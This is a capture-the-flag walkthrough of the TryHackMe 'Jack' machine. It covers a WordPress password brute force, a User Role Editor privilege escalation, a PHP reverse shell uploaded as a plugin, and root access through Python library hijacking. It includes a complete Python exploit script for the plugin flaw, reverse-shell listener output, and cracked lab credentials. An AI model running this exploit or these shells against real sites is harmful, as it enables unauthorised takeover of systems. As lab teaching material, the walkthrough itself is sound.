[THM] Jack


blhx2

Introduction

A hard-rated box on TryHackMe. It shows a route from an ordinary WordPress user to administrator: abusing a vulnerability in the User Role Editor plugin, which is widely installed and therefore worth knowing. The privilege escalation uses Python library injection (hijacking a module imported by a root-run script), another technique worth learning.

Remember to add jack.thm with the machine's IP to /etc/hosts before starting, otherwise the pages will not load properly (WordPress redirects to its configured site URL, http://jack.thm).

Information gathering

Port scan:

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo nmap -p- --min-rate=10000 10.10.183.69
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 14:36 CST
Nmap scan report for 10.10.183.69
Host is up (0.26s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds

TL;DR: 22, 80

TCP connect, service and OS scan:

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.183.69
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 14:37 CST
Nmap scan report for 10.10.183.69
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3e7978089331d0837fe2bcb614bf5d9b (RSA)
| 256 3a679faf7e66fae3f8c754496338a293 (ECDSA)
|_ 256 8cef55b023732c14094522ac84cb40d2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: WordPress 5.3.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Jack's Personal Site – Blog for Jacks writing adven...
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 5.4 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 7.1.1 - 7.1.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.27 seconds

Key finding: WordPress 5.3.2

nmap vuln script scan:

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo nmap --script=vuln 10.10.183.69
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 14:40 CST
Nmap scan report for 10.10.183.69
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-wordpress-users:
| Username found: jack
| Username found: wendy
| Username found: danny
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /wp-login.php: Possible admin folder
| /wp-json: Possible admin folder
| /robots.txt: Robots file
| /readme.html: Wordpress version: 2
| /: WordPress version: 5.3.2
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
|_ /0/: Potentially interesting folder
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.183.69
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.183.69:80/
| Form id: search
|_ Form action: http://jack.thm

Nmap done: 1 IP address (1 host up) scanned in 350.71 seconds

TL;DR: it enumerated three WordPress usernames (jack, wendy, danny) and a few paths for us. The Slowloris and CSRF findings are generic low-value noise for this box.

nikto:

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo nikto -h http://10.10.183.69
[sudo] password for kali:
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.183.69
+ Target Hostname: 10.10.183.69
+ Target Port: 80
+ Start Time: 2023-06-06 15:56:18 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Drupal Link header found with value: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /FwkQXLWd.: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Operation now in progress
+ Scan terminated: 20 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-06-06 16:19:09 (GMT8) (1371 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nothing new, and the scan took ages (1371 seconds, 20 timeouts), most likely because of the VPN link.

Web exploitation

Everything points at WordPress, so run wpscan first, with -e to enumerate everything it can.

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo wpscan --url http://jack.thm -e
[sudo] password for kali:
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.183.69]
[+] Started: Tue Jun 6 15:01:47 2023

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://jack.thm/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
| Found By: Rss Generator (Passive Detection)
| - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
| - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
| Location: http://jack.thm/wp-content/themes/online-portfolio/
| Last Updated: 2021-07-30T00:00:00.000Z
| Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
| [!] The version is out of date, the latest version is 0.1.0
| Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
| Style Name: Online Portfolio
| Style URI: https://www.amplethemes.com/downloads/online-protfolio/
| Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
| Author: Ample Themes
| Author URI: https://amplethemes.com/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 0.0.7 (80% confidence)
| Found By: Style (Passive Detection)
| - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:31 <=============> (500 / 500) 100.00% Time: 00:00:31
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:02:38 <===========> (2575 / 2575) 100.00% Time: 00:02:38

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:09 <==============> (137 / 137) 100.00% Time: 00:00:09

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:04 <====================> (71 / 71) 100.00% Time: 00:00:04

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:06 <=========> (100 / 100) 100.00% Time: 00:00:06

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:02 <===============> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] jack
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://jack.thm/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] wendy
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] danny
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jun 6 15:05:49 2023
[+] Requests Done: 3444
[+] Cached Requests: 11
[+] Data Sent: 910.723 KB
[+] Data Received: 1.393 MB
[+] Memory used: 266.402 MB
[+] Elapsed time: 00:04:01

What comes out is, again, the usernames. Note also that XML-RPC is enabled; that is the interface wpscan's password attack will use below (system.multicall lets it test many passwords per request), and disabling xmlrpc.php is the corresponding hardening step.

WP brute force

Generate a wordlist from the site's own text with cewl and see whether that works.

cewl http://jack.thm > cewlpass

Then brute force with wpscan using it; no luck.

So the only option left is rockyou.txt. Put the three usernames in a file called user and leave it running in the background: sudo wpscan --url http://jack.thm -U user -P /usr/share/wordlists/rockyou.txt

Meanwhile, let's look through the site by hand.

[screenshot: uTools_1686066516801]

A classic WordPress site. After looking around, only the login page seems useful to us, but the rockyou brute force in the background is far too slow, and requests keep timing out because of the network; THM's OpenVPN endpoints are not very stable.

Error: Request timed out.                                                   
Error: Request timed out.
Error: Request timed out.
Error: Request timed out.
trying jack / hamilton Time: 00:17:18 < > (5995 / 43033176) 0.01% ETA: ??:??:??

So try a smaller wordlist instead; Kali also ships fasttrack.txt. Let's try that.

After a short wait, it cracked wendy's password.

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo wpscan --url http://jack.thm -U user -P /usr/share/wordlists/fasttrack.txt
[sudo] password for kali:
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.183.69]
[+] Started: Tue Jun 6 16:26:36 2023


[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - wendy / changelater
Trying danny / starwars Time: 00:01:54 <============= > (646 / 868) 74.42% ETA: ??:??:??

[!] Valid Combinations Found:
| Username: wendy, Password: changelater

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jun 6 16:28:55 2023
[+] Requests Done: 818
[+] Cached Requests: 7
[+] Data Sent: 371.288 KB
[+] Data Received: 610.033 KB
[+] Memory used: 244.953 MB
[+] Elapsed time: 00:02:18

Naturally we first try wendy / changelater over SSH; that fails, so log in to the WordPress dashboard instead.

Looking around reveals nothing: just an ordinary user, and no other plugins are visible. Check the hint: ure_other_roles. Searching for it shows that this is a request parameter of the User Role Editor (URE) plugin, a widely installed third-party plugin (not part of WordPress core; wpscan's passive plugin enumeration did not spot it, so the hint is how we learn it is here).

A search of Exploit-DB turns up a Ruby module for Metasploit. I couldn't be bothered to start msf; the manual method is simple and documented online anyway: WordPress Plugin User Role Editor < 4.24 - Privilege Escalation.

So let's exploit it by hand.

WP-PLUGIN URE exploit

Telling whether the bug is present is a bit of guesswork, because the URE version is usually not visible from outside. But it costs nothing to try: as long as the dashboard sidebar offers a Users or Profile page where the user can edit their own profile, we can attempt it. Any URE version below 4.24 is affected.

First click the Update Profile button on the page; that produces a request like this:

[screenshot: jack-exploit-ure]

Now append &ure_other_roles=administrator to the end of the POST body so that we make ourselves an administrator:

[screenshot: jack-exp-success]

After that we are promoted to administrator. The root cause is that the plugin's profile-update handler did not check whether the requesting user is allowed to assign roles, so any user could hand themselves the administrator role. A quick way to confirm it worked is to reload /wp-admin/: a subscriber only sees Dashboard and Profile, an administrator sees Plugins, Appearance and Users as well.
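The manual replay above, scripted in Python as an added example (this is not code from the original post or from the plugin's authors): it logs in with the low-privileged credentials, pulls the current profile form so the WordPress nonce and existing field values are preserved, re-posts it with ure_other_roles=administrator added, and checks whether /wp-admin/plugins.php stops answering 403. The target URL, username and password on the command line are placeholders; SAMPLE_FORM is a constructed fragment of what profile.php returns and only exists to exercise the parser offline. It relies on the plugin actually being older than 4.24, which, as noted, you cannot see from outside.

```python
#!/usr/bin/env python3
"""Replay a WordPress profile update with ure_other_roles=administrator.

Added example (not from the original post). Assumes a WordPress site whose
User Role Editor plugin is older than 4.24 and a valid low-privileged login.
Usage: python3 ure_escalate.py http://jack.thm wendy changelater
"""
import http.cookiejar
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

INPUT_TAG = re.compile(r"<input\b[^>]*>", re.IGNORECASE | re.DOTALL)
ATTR = re.compile(r'(\w+)\s*=\s*"([^"]*)"')

# Constructed stand-in for the relevant part of /wp-admin/profile.php; the
# nonce, user id and e-mail address are made up for the demo.
SAMPLE_FORM = """<form id="your-profile" action="profile.php" method="post">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="8f3e1c2a9b" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/profile.php" />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="user_id" id="user_id" value="2" />
<input type="text" name="nickname" id="nickname" value="wendy" class="regular-text" />
<input type="email" name="email" id="email" value="wendy@jack.thm" />
<input type="submit" name="submit" id="submit" class="button button-primary" value="Update Profile" />
</form>"""


def form_fields(html):
    """name=value of every <input> that has a name, whatever the attribute
    order inside the tag. Unchecked checkboxes are sent too, which is
    harmless for this form but would matter for a generic replay."""
    fields = {}
    for tag in INPUT_TAG.findall(html):
        attrs = dict(ATTR.findall(tag))
        if "name" in attrs:
            fields[attrs["name"]] = attrs.get("value", "")
    return fields


def escalation_body(fields, role="administrator"):
    """The form exactly as the browser would submit it, plus the one
    parameter the vulnerable plugin trusts without a capability check."""
    payload = dict(fields)
    payload["ure_other_roles"] = role
    return urllib.parse.urlencode(payload)


def is_admin(opener, target):
    """Subscribers get HTTP 403 on plugins.php; administrators get the page."""
    try:
        opener.open(f"{target}/wp-admin/plugins.php")
        return True
    except urllib.error.HTTPError as err:
        if err.code == 403:
            return False
        raise


def escalate(target, user, password):
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    opener.open(f"{target}/wp-login.php")  # sets wordpress_test_cookie
    login = urllib.parse.urlencode({
        "log": user, "pwd": password, "wp-submit": "Log In",
        "redirect_to": f"{target}/wp-admin/", "testcookie": "1"}).encode()
    opener.open(f"{target}/wp-login.php", login)
    # The form carries the nonce and the current values; replay it intact.
    html = opener.open(f"{target}/wp-admin/profile.php").read().decode()
    fields = form_fields(html)
    if "_wpnonce" not in fields:
        raise SystemExit("login failed or profile form not found")
    opener.open(f"{target}/wp-admin/profile.php", escalation_body(fields).encode())
    return is_admin(opener, target)


if __name__ == "__main__":
    if len(sys.argv) != 4:
        raise SystemExit(f"usage: {sys.argv[0]} http://jack.thm user password")
    print("administrator" if escalate(*sys.argv[1:]) else "still not admin")
```

Replaying the whole form rather than only the nonce matters: profile.php re-validates the e-mail field and rejects an empty one, so a minimal POST with just _wpnonce and ure_other_roles fails before the plugin hook ever runs.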

Once we hold a WordPress administrator account, things get a lot simpler: the usual theme-editor and plugin-upload routes to a shell are both open.

Upload a reverse shell

However, editing a theme template directly produces an error and the edit cannot be saved.

Doesn't matter; plugin installation will do.

Prepare a PHP reverse shell and upload it as a plugin.

[screenshot: jack-upload-plugin]

Once uploaded, it can be found under /wp-content/uploads (directory listing is enabled there, as wpscan noted).

[screenshot: jack-upload-shell]

Requesting it directly gives us a shell.

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo nc -lvp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [10.11.40.37] from jack.thm [10.10.183.69] 34350
bash: cannot set terminal process group (1123): Inappropriate ioctl for device
bash: no job control in this shell
www-data@jack:/var/www/html/wp-content/uploads/2023/06$ uname -a
uname -a
Linux jack 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
www-data@jack:/var/www/html/wp-content/uploads/2023/06$

Shell obtained. The user flag is in jack's home directory and is readable by www-data.

Privilege escalation

www-data's privileges are as poor as ever: no password, so sudo -l is out; no useful SUID binaries; and nothing special in the cron tables at first glance.

Manual enumeration

Start with /home, which holds only one user, jack. Look at his home directory.

www-data@jack:/home/jack$ ls -la
ls -la
total 36
drwxr-xr-x 4 jack jack 4096 Jan 10 2020 .
drwxr-xr-x 3 root root 4096 Jan 8 2020 ..
lrwxrwxrwx 1 jack jack 9 Jan 10 2020 .bash_history -> /dev/null
-rw-r--r-- 1 jack jack 220 Jan 8 2020 .bash_logout
-rw-r--r-- 1 jack jack 3771 Jan 8 2020 .bashrc
drwx------ 2 jack jack 4096 Jan 9 2020 .cache
-rw-r--r-- 1 jack jack 655 Jan 8 2020 .profile
drwx------ 2 jack jack 4096 Jan 10 2020 .ssh
-rw-r--r-- 1 root root 140 Jan 10 2020 reminder.txt
-rw-rw-r-- 1 jack jack 33 Jan 10 2020 user.txt
www-data@jack:/home/jack$ cat user
cat user.txt
********************************
www-data@jack:/home/jack$ cat re
cat reminder.txt

Please read the memo on linux file permissions, last time your backups almost got us hacked! Jack will hear about this when he gets back.

www-data@jack:/home/jack$ cat .bash_history
cat .bash_history
www-data@jack:/home/jack$

reminder.txt gives us a very important lead: someone on this system likes to back up important files, and got the permissions wrong last time. Go straight to /var/backups.

www-data@jack:/var/backups$ ls -la
ls -la
total 776
drwxr-xr-x 2 root root 4096 Jan 10 2020 .
drwxr-xr-x 14 root root 4096 Jan 9 2020 ..
-rw-r--r-- 1 root root 40960 Jan 9 2020 alternatives.tar.0
-rw-r--r-- 1 root root 9931 Jan 9 2020 apt.extended_states.0
-rw-r--r-- 1 root root 713 Jan 8 2020 apt.extended_states.1.gz
-rw-r--r-- 1 root root 11 Jan 8 2020 dpkg.arch.0
-rw-r--r-- 1 root root 43 Jan 8 2020 dpkg.arch.1.gz
-rw-r--r-- 1 root root 437 Jan 8 2020 dpkg.diversions.0
-rw-r--r-- 1 root root 202 Jan 8 2020 dpkg.diversions.1.gz
-rw-r--r-- 1 root root 207 Jan 9 2020 dpkg.statoverride.0
-rw-r--r-- 1 root root 129 Jan 8 2020 dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 552673 Jan 9 2020 dpkg.status.0
-rw-r--r-- 1 root root 129487 Jan 8 2020 dpkg.status.1.gz
-rw------- 1 root root 813 Jan 10 2020 group.bak
-rw------- 1 root shadow 679 Jan 10 2020 gshadow.bak
-rwxrwxrwx 1 root root 1675 Jan 10 2020 id_rsa
-rw------- 1 root root 1626 Jan 9 2020 passwd.bak
-rw------- 1 root shadow 1066 Jan 10 2020 shadow.bak
www-data@jack:/var/backups$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key body omitted]
-----END RSA PRIVATE KEY-----

A free SSH private key: id_rsa is world-readable and even world-writable (mode 777), exactly the file-permission mistake the memo complained about.

Tried root with it without success (of course it isn't that easy), which leaves jack; that login succeeds. Save the key locally, chmod 600 it (ssh refuses a key file with looser permissions), and connect. The IP differs from earlier because the machine was restarted in between.

ssh jack@10.10.237.140 -i root_rsa

Python library injection

Since we logged in as jack over SSH with a key, we still don't know his password, so sudo -l is obviously out. Looking around, there is something under /opt, and it is a Python file, which is unusual; normally there is nothing there. (If you ask why I looked in /opt: earlier boxes have had things hidden there, so lesson learned; it's just one ls anyway.) Without that instinct, a linpeas run will also flag an uncommon directory under /opt; just go and look.

[screenshot: uTools_1686128367451]

The current user can only read checker.py, not write or execute it. Let's look at what it contains.

jack@jack:/opt/statuscheck$cat checker.py
import os

os.system("/usr/bin/curl -s -I http://127.0.0.1 >/opt/statuscheck/output.log")

It just curls the local web server for its headers and writes them to output.log in the same directory. Looking at output.log, its contents are refreshed every so often, so checker.py is a scheduled job that writes a log, and evidently runs as root. I searched for where the schedule is defined and how it is triggered but couldn't find it; what we do know is that it runs periodically. (The usual places to check are /etc/crontab, /etc/cron.d/, /var/spool/cron/crontabs/ and systemctl list-timers; pspy will also show the process and its uid when it fires.)

But we have no permission to modify the file, and curl is referenced by absolute path, so PATH hijacking is hopeless, and we almost certainly cannot touch /usr/bin/curl. Dead end?

Not giving up, search for how to exploit a Python script that runs as root.

[screenshot: uTools_1686129080629]

A blog post lists several ways of escalating through Python scripts.

Among them, library hijacking.

The script imports the os library; let's see whether we can hijack it.

First locate the os library file and check whether we have permission on it; normally these directories are writable by root only.

jack@jack:/opt/statuscheck$locate os.py
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
/usr/lib/python2.7/encodings/palmos.py
/usr/lib/python2.7/encodings/palmos.pyc
/usr/lib/python3/dist-packages/LanguageSelector/macros.py
/usr/lib/python3.5/os.py
/usr/lib/python3.5/encodings/palmos.py
jack@jack:/opt/statuscheck$ls -l /usr/lib/python2.7/os.py
-rw-rw-r-x 1 root family 25908 Nov 16 2020 /usr/lib/python2.7/os.py
jack@jack:/opt/statuscheck$id
uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1001(family)

So the family group can edit the os library file, and jack happens to be in that group. Inject our reverse shell into the os library with vim; when checker.py imports it, the payload runs as root and hands us a root reverse shell. Ideally we would put the payload inside os.system, but I couldn't find that function anywhere in the file, so I simply wrote it at the end. (That works regardless: os.py pulls system in from the posix built-in module rather than defining it, and any top-level statement in os.py runs as soon as a new interpreter loads the module.)

[screenshot: uTools_1686065694886]

After writing it, use tail -f output.log to watch for the file being updated; when it changes, checker.py has run, and the shell should have come back. Two caveats: every Python 2.7 process on the host loads this os.py, so make the payload non-blocking (background it) or the job, and anything else using Python 2, hangs waiting on the reverse shell; and restore the original file when you are done.
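Before editing a library it is worth knowing which imports of a privileged script are reachable at all. The audit below is an added example, not code from the original post: it parses a script for its imports, resolves each one the way the interpreter would, and reports modules whose file or directory is writable by the current user (the os.py case above) or which could be shadowed by dropping a same-named file into a writable directory earlier on the search path. The sample checker.py and helper module it creates under a temporary directory are constructed for the demo; run it as the low-privileged user on the target against the real script path to get the real answer.

```python
#!/usr/bin/env python3
"""Audit a Python script for imports a local user could hijack.

Added example, not from the original post. Given a script that a privileged
scheduler runs (the page's /opt/statuscheck/checker.py), list every imported
module whose file, directory, or search-path precedence the current user can
tamper with. The files written by main() are constructed for the demo.
"""
import ast
import importlib.machinery
import os
import sys
import tempfile

# Modules already loaded when this audit started (os, sys, ...). The
# interpreter imports these before any script runs, so a copy dropped earlier
# in sys.path is never consulted for them; they can only be hijacked by
# editing the file that is actually loaded, which is what happened on the box.
PRELOADED = frozenset(sys.modules)


def imported_modules(script_path):
    """Top-level names pulled in by `import x` / `from x import y`."""
    with open(script_path) as fh:
        tree = ast.parse(fh.read(), script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def writable_imports(script_path, search_path=None):
    """Return (module, file, reason) for each import the current user could
    hijack. search_path mimics the victim's sys.path; the script's own
    directory is prepended, exactly as the interpreter does."""
    path = [os.path.dirname(os.path.abspath(script_path))] + list(
        sys.path if search_path is None else search_path)
    findings = []
    for name in imported_modules(script_path):
        if name in sys.builtin_module_names:
            continue  # compiled into the interpreter, no file to edit
        spec = importlib.machinery.PathFinder.find_spec(name, path)
        if spec is None or not spec.has_location or not spec.origin:
            continue
        origin = os.path.abspath(spec.origin)
        # Path entry that supplied the module (parent dir for a package).
        containing = os.path.dirname(origin)
        if spec.submodule_search_locations is not None:
            containing = os.path.dirname(containing)
        if os.access(origin, os.W_OK):
            findings.append((name, origin, "module file is writable"))
        if os.access(os.path.dirname(origin), os.W_OK):
            findings.append((name, origin, "module directory is writable"))
        if name not in PRELOADED:
            # A writable directory searched before the real one lets an
            # attacker drop <name>.py there and win the import.
            for entry in path:
                if os.path.abspath(entry) == containing:
                    break
                if os.path.isdir(entry) and os.access(entry, os.W_OK):
                    findings.append((name, origin,
                                     f"shadowable from writable path entry {entry}"))
                    break
    return findings


def main():
    root = tempfile.mkdtemp(prefix="hijack-demo-")
    lib = os.path.join(root, "lib")
    os.mkdir(lib)
    with open(os.path.join(lib, "helper.py"), "w") as fh:
        fh.write("def ping():\n    return 'ok'\n")
    script = os.path.join(root, "checker.py")  # stands in for /opt/statuscheck/checker.py
    with open(script, "w") as fh:
        fh.write("import os\nimport helper\n"
                 "os.system('/usr/bin/curl -s -I http://127.0.0.1 >/dev/null')\n")
    for module, origin, reason in writable_imports(script, [lib] + sys.path):
        print(f"{module:8} {reason}: {origin}")


if __name__ == "__main__":
    main()
```

On the target the interesting line would be the one for os pointing at /usr/lib/python2.7/os.py, provided the audit is run with the same interpreter the cron job uses; run under python3 it resolves the python3 stdlib instead and reports nothing for os, so check the shebang or the scheduler entry first.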

[screenshot: uTools_1686129697078]

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo nc -lvp 8080
[sudo] password for kali:
listening on [any] 8080 ...
connect to [10.8.134.236] from jack.thm [10.10.237.140] 43558
bash: cannot set terminal process group (2730): Inappropriate ioctl for device
bash: no job control in this shell
root@jack:~# ls -la
ls -la
total 28
drwxr-x--x 4 root root 4096 Nov 16 2020 .
drwxr-xr-x 23 root root 4096 Jan 8 2020 ..
lrwxrwxrwx 1 root root 9 Jan 10 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwx------ 2 root root 4096 Nov 16 2020 .cache
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 33 Jan 10 2020 root.txt
drwxr-xr-x 2 root root 4096 Nov 16 2020 .ssh
root@jack:~# cat root.txt
cat root.txt
*****************************
root@jack:~#

Root flag obtained.